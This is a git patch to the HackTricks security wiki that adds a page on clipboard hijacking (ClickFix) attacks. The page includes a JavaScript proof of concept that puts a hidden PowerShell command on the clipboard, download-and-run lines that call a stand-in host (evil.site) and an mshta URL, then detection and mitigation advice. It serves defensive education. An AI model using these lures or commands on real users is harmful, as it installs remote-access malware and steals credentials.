From 2c5590c44851c9e10c8d058d4e99c1ad99ba8b2d Mon Sep 17 00:00:00 2001
From: HackTricks News Bot <bot@hacktricks.xyz>
Date: Mon, 14 Jul 2025 12:51:11 +0000
Subject: [PATCH] Add content from: Fix the Click: Preventing the ClickFix
 Attack Vector

---
 src/SUMMARY.md                                |  1 +
 ...nexmon-monitor-and-injection-on-android.md |  4 +-
 .../phishing-methodology/README.md            |  8 ++
 .../clipboard-hijacking.md                    | 96 +++++++++++++++++++
 .../ios-pentesting-without-jailbreak.md       |  2 +-
 .../pentesting-telnet.md                      |  2 +-
 6 files changed, 109 insertions(+), 4 deletions(-)
 create mode 100644 src/generic-methodologies-and-resources/phishing-methodology/clipboard-hijacking.md

diff --git a/src/SUMMARY.md b/src/SUMMARY.md
index 93b6e3273..f741a1440 100644
--- a/src/SUMMARY.md
+++ b/src/SUMMARY.md
@@ -28,6 +28,7 @@
   - [Enable Nexmon Monitor And Injection On Android](generic-methodologies-and-resources/pentesting-wifi/enable-nexmon-monitor-and-injection-on-android.md)
   - [Evil Twin EAP-TLS](generic-methodologies-and-resources/pentesting-wifi/evil-twin-eap-tls.md)
 - [Phishing Methodology](generic-methodologies-and-resources/phishing-methodology/README.md)
+  - [Clipboard Hijacking](generic-methodologies-and-resources/phishing-methodology/clipboard-hijacking.md)
   - [Clone a Website](generic-methodologies-and-resources/phishing-methodology/clone-a-website.md)
   - [Detecting Phishing](generic-methodologies-and-resources/phishing-methodology/detecting-phising.md)
   - [Discord Invite Hijacking](generic-methodologies-and-resources/phishing-methodology/discord-invite-hijacking.md)
diff --git a/src/generic-methodologies-and-resources/pentesting-wifi/enable-nexmon-monitor-and-injection-on-android.md b/src/generic-methodologies-and-resources/pentesting-wifi/enable-nexmon-monitor-and-injection-on-android.md
index 2ee072b12..9c74b3b41 100644
--- a/src/generic-methodologies-and-resources/pentesting-wifi/enable-nexmon-monitor-and-injection-on-android.md
+++ b/src/generic-methodologies-and-resources/pentesting-wifi/enable-nexmon-monitor-and-injection-on-android.md
@@ -22,7 +22,7 @@ The same technique applies to any handset that has a publicly available NexMon p
 * NexMon Magisk ZIP or self-compiled patch providing:
   * `/system/lib*/libnexmon.so`
   * `/system/xbin/nexutil`
-* Hijacker ≥ 1.7 (arm/arm64) – https://github.com/chrisk44/Hijacker
+* Hijacker ≥ 1.7 (arm/arm64) – [https://github.com/chrisk44/Hijacker](https://github.com/chrisk44/Hijacker)
 * (Optional) Kali NetHunter or any Linux chroot where you intend to run wireless tools
 
 ---
@@ -130,4 +130,4 @@ Performance on the Galaxy S10 is comparable to external USB NICs (~20 dBm TX, 2-
 * [NexMon – firmware patching framework](https://github.com/seemoo-lab/nexmon)
 * [Hijacker (aircrack-ng GUI for Android)](https://github.com/chrisk44/Hijacker)
 
-{{#include ../../banners/hacktricks-training.md}}
\ No newline at end of file
+{{#include ../../banners/hacktricks-training.md}}
diff --git a/src/generic-methodologies-and-resources/phishing-methodology/README.md b/src/generic-methodologies-and-resources/phishing-methodology/README.md
index 22d7af72f..ab2c5dadf 100644
--- a/src/generic-methodologies-and-resources/phishing-methodology/README.md
+++ b/src/generic-methodologies-and-resources/phishing-methodology/README.md
@@ -458,6 +458,14 @@ You can **buy a domain with a very similar name** to the victims domain **and/or
 
 Use [**Phishious** ](https://github.com/Rices/Phishious)to evaluate if your email is going to end in the spam folder or if it's going to be blocked or successful.
 
+## Clipboard Hijacking / Pastejacking
+
+Attackers can silently copy malicious commands into the victim’s clipboard from a compromised or typosquatted web page and then trick the user to paste them inside **Win + R**, **Win + X** or a terminal window, executing arbitrary code without any download or attachment.
+
+{{#ref}}
+clipboard-hijacking.md
+{{#endref}}
+
 ## References
 
 - [https://zeltser.com/domain-name-variations-in-phishing/](https://zeltser.com/domain-name-variations-in-phishing/)
diff --git a/src/generic-methodologies-and-resources/phishing-methodology/clipboard-hijacking.md b/src/generic-methodologies-and-resources/phishing-methodology/clipboard-hijacking.md
new file mode 100644
index 000000000..195dd87af
--- /dev/null
+++ b/src/generic-methodologies-and-resources/phishing-methodology/clipboard-hijacking.md
@@ -0,0 +1,96 @@
+# Clipboard Hijacking (Pastejacking) Attacks
+
+{{#include ../../banners/hacktricks-training.md}}
+
+> "Never paste anything you did not copy yourself." – old but still valid advice
+
+## Overview
+
+Clipboard hijacking – also known as *pastejacking* – abuses the fact that users routinely copy-and-paste commands without inspecting them. A malicious web page (or any JavaScript-capable context such as an Electron or Desktop application) programmatically places attacker-controlled text into the system clipboard. Victims are encouraged, normally by carefully crafted social-engineering instructions, to press **Win + R** (Run dialog), **Win + X** (Quick Access / PowerShell), or open a terminal and *paste* the clipboard content, immediately executing arbitrary commands.
+
+Because **no file is downloaded and no attachment is opened**, the technique bypasses most e-mail and web-content security controls that monitor attachments, macros or direct command execution. The attack is therefore popular in phishing campaigns delivering commodity malware families such as NetSupport RAT, Latrodectus loader or Lumma Stealer.
+
+## JavaScript Proof-of-Concept
+
+```html
+<!-- Any user interaction (click) is enough to grant clipboard write permission in modern browsers -->
+<button id="fix" onclick="copyPayload()">Fix the error</button>
+<script>
+function copyPayload() {
+  const payload = `powershell -nop -w hidden -enc <BASE64-PS1>`; // hidden PowerShell one-liner
+  navigator.clipboard.writeText(payload)
+    .then(() => alert('Now press  Win+R , paste and hit Enter to fix the problem.'));
+}
+</script>
+```
+
+Older campaigns used `document.execCommand('copy')`, newer ones rely on the asynchronous **Clipboard API** (`navigator.clipboard.writeText`).
+
+## The ClickFix / ClearFake Flow
+
+1. User visits a typosquatted or compromised site (e.g. `docusign.sa[.]com`)
+2. Injected **ClearFake** JavaScript calls an `unsecuredCopyToClipboard()` helper that silently stores a Base64-encoded PowerShell one-liner in the clipboard.
+3. HTML instructions tell the victim to: *“Press **Win + R**, paste the command and press Enter to resolve the issue.”*
+4. `powershell.exe` executes, downloading an archive that contains a legitimate executable plus a malicious DLL (classic DLL sideloading).
+5. The loader decrypts additional stages, injects shellcode and installs persistence (e.g. scheduled task) – ultimately running NetSupport RAT / Latrodectus / Lumma Stealer.
+
+### Example NetSupport RAT Chain
+
+```powershell
+powershell -nop -w hidden -enc <Base64>
+# ↓ Decodes to:
+Invoke-WebRequest -Uri https://evil.site/f.zip -OutFile %TEMP%\f.zip ;
+Expand-Archive %TEMP%\f.zip -DestinationPath %TEMP%\f ;
+%TEMP%\f\jp2launcher.exe             # Sideloads msvcp140.dll
+```
+
+* `jp2launcher.exe` (legitimate Java WebStart) searches its directory for `msvcp140.dll`.
+* The malicious DLL dynamically resolves APIs with **GetProcAddress**, downloads two binaries (`data_3.bin`, `data_4.bin`) via **curl.exe**, decrypts them using a rolling XOR key `"https://google.com/"`, injects the final shellcode and unzips **client32.exe** (NetSupport RAT) to `C:\ProgramData\SecurityCheck_v1\`.
+
+### Latrodectus Loader
+
+```
+powershell -nop -enc <Base64>  # Cloud Identificator: 2031
+```
+
+1. Downloads `la.txt` with **curl.exe**
+2. Executes the JScript downloader inside **cscript.exe**
+3. Fetches an MSI payload → drops `libcef.dll` besides a signed application → DLL sideloading → shellcode → Latrodectus.
+
+### Lumma Stealer via MSHTA
+
+```
+mshta https://iplogger.co/xxxx =+\\xxx
+```
+
+The **mshta** call launches a hidden PowerShell script that retrieves `PartyContinued.exe`, extracts `Boat.pst` (CAB), reconstructs `AutoIt3.exe` through `extrac32` & file concatenation and finally runs an `.a3x` script which exfiltrates browser credentials to `sumeriavgv.digital`.
+
+## Detection & Hunting
+
+Blue-teams can combine clipboard, process-creation and registry telemetry to pinpoint pastejacking abuse:
+
+* Windows Registry: `HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU` keeps a history of **Win + R** commands – look for unusual Base64 / obfuscated entries.
+* Security Event ID **4688** (Process Creation) where `ParentImage` == `explorer.exe` and `NewProcessName` in { `powershell.exe`, `wscript.exe`, `mshta.exe`, `curl.exe`, `cmd.exe` }.
+* Event ID **4663** for file creations under `%LocalAppData%\Microsoft\Windows\WinX\` or temporary folders right before the suspicious 4688 event.
+* EDR clipboard sensors (if present) – correlate `Clipboard Write` followed immediately by a new PowerShell process.
+
+## Mitigations
+
+1. Browser hardening – disable clipboard write-access (`dom.events.asyncClipboard.clipboardItem` etc.) or require user gesture.
+2. Security awareness – teach users to *type* sensitive commands or paste them into a text editor first.
+3. PowerShell Constrained Language Mode / Execution Policy + Application Control to block arbitrary one-liners.
+4. Network controls – block outbound requests to known pastejacking and malware C2 domains.
+
+## Related Tricks
+
+* **Discord Invite Hijacking** often abuses the same ClickFix approach after luring users into a malicious server:
+  {{#ref}}
+  discord-invite-hijacking.md
+  {{#endref}}
+
+## References
+
+- [Fix the Click: Preventing the ClickFix Attack Vector](https://unit42.paloaltonetworks.com/preventing-clickfix-attack-vector/)
+- [Pastejacking PoC – GitHub](https://github.com/dxa4481/Pastejacking)
+
+{{#include ../../banners/hacktricks-training.md}}
\ No newline at end of file
diff --git a/src/mobile-pentesting/ios-pentesting/ios-pentesting-without-jailbreak.md b/src/mobile-pentesting/ios-pentesting/ios-pentesting-without-jailbreak.md
index 791da2761..1f226fae0 100644
--- a/src/mobile-pentesting/ios-pentesting/ios-pentesting-without-jailbreak.md
+++ b/src/mobile-pentesting/ios-pentesting/ios-pentesting-without-jailbreak.md
@@ -106,7 +106,7 @@ Recent Frida releases (>=16) automatically handle pointer authentication and oth
 
 ### Automated dynamic analysis with MobSF (no jailbreak)
 
-[MobSF](https://mobsf.github.io/Mobile-Security-Framework-MobSF/) can instrument a dev-signed IPA on a real device using the same technique (`get_task_allow`) and provides a web UI with filesystem browser, traffic capture and Frida console【†L2-L3】. The quickest way is to run MobSF in Docker and then plug your iPhone via USB:
+[MobSF](https://mobsf.github.io/Mobile-Security-Framework-MobSF/) can instrument a dev-signed IPA on a real device using the same technique (`get_task_allow`) and provides a web UI with filesystem browser, traffic capture and Frida console【】. The quickest way is to run MobSF in Docker and then plug your iPhone via USB:
 
 ```bash
 docker pull opensecurity/mobile-security-framework-mobsf:latest
diff --git a/src/network-services-pentesting/pentesting-telnet.md b/src/network-services-pentesting/pentesting-telnet.md
index 31ca7a6ae..5eb9580d6 100644
--- a/src/network-services-pentesting/pentesting-telnet.md
+++ b/src/network-services-pentesting/pentesting-telnet.md
@@ -139,4 +139,4 @@ After a shell is obtained remember that **TTYs are usually dumb**; upgrade with
 
 
 
-{{#include /banners/hacktricks-training.md}}
+{{#include ../banners/hacktricks-training.md}}